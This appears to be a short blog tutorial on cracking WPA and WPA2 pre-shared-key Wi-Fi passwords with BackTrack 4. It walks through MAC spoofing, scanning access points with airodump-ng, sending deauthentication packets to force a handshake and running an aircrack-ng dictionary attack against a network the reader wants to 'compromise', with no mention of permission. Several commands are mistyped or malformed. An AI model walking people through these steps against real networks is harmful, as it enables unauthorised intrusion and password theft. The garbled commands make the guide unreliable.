How to Cracking WPA-PSK and WPA-2 with BackTrack 4 Beta
The mechanics of cracking WPA is simple and straightforward, the biggest drawback is that you must have the password in your dictionary file after you capture the handshake and there must be a computer connected to the AP you want to compromise. I am using and HP Pavilion Laptop with a Raylink wireless USB antenna, I booted Bactrack 4 from CD and I am eady to begin.
First I have to stop the wireless card so I can manipulate some settings.
airmon-ng stop wlan0
(wlan0 is my wireless USB atenna), if I am usnsure what devices I have I would run
ifconfig -a
to show me all available NIC's
Now down the wireless card by typing
ifconfig wlan0 down
I am now ready to assign a fake mac address to my USB device
macchanger - - mac 00:11:22:33:44:55
I can use any mac address as long as its valid in length and characters this one is simply easy to use.
Next you must identify the bssid and channel of the AP you want to crack
airodump-ng wlan0
This will show you all AP within the range of your wireless card. The screen will look something like
BSSID PWR Beacons #Data #/s CH MB ENC CIPHER AUTH ESSID
00:1C:58:AE:C3:01 -60 124 1 0 1 54 WPA2 CCMP PSK Network
BSSID Station PWR Rate Lost Packets Probe
00:1C:58:AE:C3:01 00:1B:66:AD:C6:00 -57 0- 1 48 Network
You will need the bssid and channel to proceed to the next step
airodump-ng -c 1 -w wpa1 - - bssid 00:1C:58:AE:C3:01 wlan0
This command starts monitoring traffic on the specific AP and writes the information collected to a file, in this example the file is called wpa1. This file is used in aircrack to decrypt the actual password
Now open a new shell and we are ready to caputre the handshake between a workstation and the AP.
aireplay-ng -0 10 -bssid 00:1C:58:AE:C3:01 -c 00:1C:58:AE:C3:01 wlan0
This command sends a reinjection of deauth packet to the AP and will force a new handshake between the workstation and the AP. When you capture it your airodump screen with show a message across the top saying it has the Handshake.
Now you are ready to crack the password, you can now stop both the airodump and aireplay shells and open a final new shell. By default BackTrack 4 has a dictionary file you can use though I suggest modifing it with additional passwords for a more feature rich attack. It is located under /pentest/wireless/cowpatty and is named dict. You can navigate to it using Konqueror or via command line Now in your new console type in
aircrack-ng wpa1 -w /pentest/wireless/cowpatty/dict
Now if you have the pasword in your dict file it will only take a few moments for the crack and the password to be show on screen.
Many AP now change passwords every hour others have WPA keys with very high encryption values and make it extremely difficult to crack. Bottom line if your a company and you have WPA using very high encryption values this make it almost impossible to crack unless a professional has hours and hours of time and a dict file hundreds of megabytes in size.
0 komentar:
Posting Komentar